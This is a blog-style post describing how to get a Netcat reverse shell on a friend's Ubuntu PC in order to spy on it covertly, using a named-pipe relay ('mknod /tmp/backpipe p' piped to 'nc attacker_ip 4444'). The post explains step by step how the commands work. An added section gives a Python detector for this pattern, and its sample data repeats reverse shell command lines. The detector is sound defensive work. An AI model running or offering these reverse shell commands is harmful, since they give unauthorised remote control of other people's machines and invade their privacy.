So it all began when one day I was just thinking of spying on my friend's Ubuntu PC to check what kind of stuff he has (obviously NSFW stuff)
So my first approach was to set up a Netcat reverse shell with -e, but I was greeted with an error:
nc -e /bin/sh 192.168.0.83 4444
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]
and it was kinda like WHAAAAAAATTTTTT!!!!!!!!!!!
I know kinda overkill reaction
so I wandered off into the wild cyberspace for my answer,
but all I got was failure.
As in the traditional Netcat, if the well-named GAPING_SECURITY_HOLE option isn't defined in the Netcat source when it is compiled, the resulting Netcat executable won't support -e.
So what now, do I have to lose my hope of spying on my friend, or try harder?
So after a while, I found a way that uses a Netcat relay: it relays the victim's shell through a named pipe to the attacker's Netcat listener.
So here it goes
Before anything else, start the attacker's Netcat listener:
nc -nvlp 4444
Now on the victim PC:
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attacker_ip 4444 1>/tmp/backpipe
So how does it work?
Here, I've first created a named pipe (AKA FIFO) called backpipe using the mknod command. The mknod command creates special files in the file system, and here I'm creating something called "backpipe" of type "p", which is a named pipe. This FIFO will be used to shuttle data back to our shell's input. I created my backpipe in /tmp because pretty much any account is allowed to write there.
Then, I invoke my shell (/bin/sh), the most common shell available on all kinds of Linux distros, pulling its Standard Input from the backpipe (0</tmp/backpipe). I pipe the output of /bin/sh (|) to my Netcat client. That Netcat client connects to the attacker's listener on port 4444 (nc attacker_ip 4444). I then take Netcat's Standard Output and dump it into the backpipe (1>/tmp/backpipe), which closes the loop: whatever the listener sends is written into the FIFO, and the shell reads it as its input. On most shells, you can dispense with the 0< and 1> syntax, but on occasion I've seen some weird shells where it doesn't work unless you use 0< and 1>. I always throw them in, just to make sure it'll work.
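If you are on the receiving end of this trick rather than the one pulling it, the good news is that the relay above has a very recognisable shape in process telemetry: a FIFO gets created (mknod ... p, or its equivalent mkfifo), and shortly after, a shell command line uses the same path as both its stdin and stdout while netcat makes an outbound connection. (For what it's worth, the usage text above is the OpenBSD netcat that Ubuntu ships by default; that variant never had -e to begin with.) The script below is my own added example, not part of the original post: it runs over a handful of constructed process-start records (a made-up execve feed, not real logs) and flags the pattern, correlating the relay with the pipe creation seen earlier.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-start records, in the shape an auditd/EDR
# execve feed might hand you. Hosts, pids and paths are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 101, "cmd": "mknod /tmp/backpipe p"},
    {"pid": 102, "cmd": "/bin/sh 0</tmp/backpipe | nc attacker_ip 4444 1>/tmp/backpipe"},
    {"pid": 103, "cmd": "nc -nvlp 4444"},
    {"pid": 104, "cmd": "tar czf /tmp/backup.tgz /home/alice"},
    {"pid": 105, "cmd": "mkfifo /dev/shm/f"},
    {"pid": 106, "cmd": "sh -i </dev/shm/f | nc 10.0.0.5 9001 >/dev/shm/f"},
    {"pid": 107, "cmd": "sort </tmp/in >/tmp/out"},
]

# "mknod <path> p" (the command from the post) or "mkfifo <path>": both create a FIFO.
MKNOD_FIFO = re.compile(r"\bmknod\s+(?:-m\s+\S+\s+)?(\S+)\s+p\b")
MKFIFO = re.compile(r"\bmkfifo\s+(?:-m\s+\S+\s+)?(\S+)")
# Outbound netcat: nc [flags...] <host> <port>. A listener such as
# "nc -nvlp 4444" has no host argument and therefore does not match.
NC_CONNECT = re.compile(r"\b(?:nc|netcat|ncat)\b(?:\s+-\S+)*\s+(?!-)(\S+)\s+(\d{1,5})\b")
# Redirections, with an optional fd number: 0</path, </path, 1>/path, >/path
STDIN_REDIR = re.compile(r"(?:^|\s)\d?<\s*(\S+)")
STDOUT_REDIR = re.compile(r"(?:^|\s)\d?>\s*(\S+)")


def fifo_created(cmd: str) -> Optional[str]:
    """Return the path of a FIFO this command line creates, or None."""
    m = MKNOD_FIFO.search(cmd) or MKFIFO.search(cmd)
    return m.group(1) if m else None


def relay_fifo(cmd: str) -> Optional[str]:
    """Return the path used as both stdin and stdout on a command line that also
    makes an outbound netcat connection, i.e. the relay shape
    '/bin/sh 0</tmp/backpipe | nc host port 1>/tmp/backpipe'. None otherwise."""
    if not NC_CONNECT.search(cmd):
        return None
    # Drop fd duplications such as 2>&1; only real paths are interesting here.
    ins = {p for p in STDIN_REDIR.findall(cmd) if not p.startswith("&")}
    outs = {p for p in STDOUT_REDIR.findall(cmd) if not p.startswith("&")}
    shared = ins & outs
    return sorted(shared)[0] if shared else None


def detect(events: List[Dict]) -> List[Dict]:
    """Walk the events in order and report FIFO creations and FIFO-backed netcat
    relays. A relay whose pipe was created earlier in the same feed is marked
    correlated, which is the strongest signal and the one worth paging on."""
    created = set()
    findings = []
    for ev in events:
        cmd = ev["cmd"]
        path = fifo_created(cmd)
        if path:
            created.add(path)
            findings.append({"pid": ev["pid"], "kind": "fifo_created",
                             "path": path, "correlated": False})
            continue
        path = relay_fifo(cmd)
        if path:
            findings.append({"pid": ev["pid"], "kind": "nc_fifo_relay",
                             "path": path, "correlated": path in created})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        flag = "CORRELATED" if f["correlated"] else ""
        print(f"pid={f['pid']} {f['kind']} path={f['path']} {flag}")
```

The listener line (pid 103) is deliberately not flagged: on its own, a listening netcat is how plenty of admins transfer files, and the outbound connection plus the shared FIFO path is what actually distinguishes the relay. The same logic ports directly to a SIEM rule if your agent records full command lines; the one caveat is that the redirect parsing is regex-based, so a command line wrapped in `sh -c "..."` with quoting inside will need the inner string extracted first.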